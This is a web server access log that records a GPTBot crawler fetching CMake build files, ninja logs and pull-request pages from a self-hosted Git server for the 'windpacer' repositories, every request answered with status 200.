git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16064] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15126] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11052] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24301] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11000] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_deps?display=rendered" [Client 74.7.227.38] [Length 10957] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:18:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:18:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11219] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11221] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log?display=source" [Client 74.7.227.38] [Length 11433] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:18:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=latest&state=all&type=all" -[17/Feb/2026:18:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 2023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:18:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11612] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10780] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10780] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11615] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11612] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10781] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9972] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10781] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10780] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10784] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10783] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10779] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10756] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11616] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10781] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11615] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 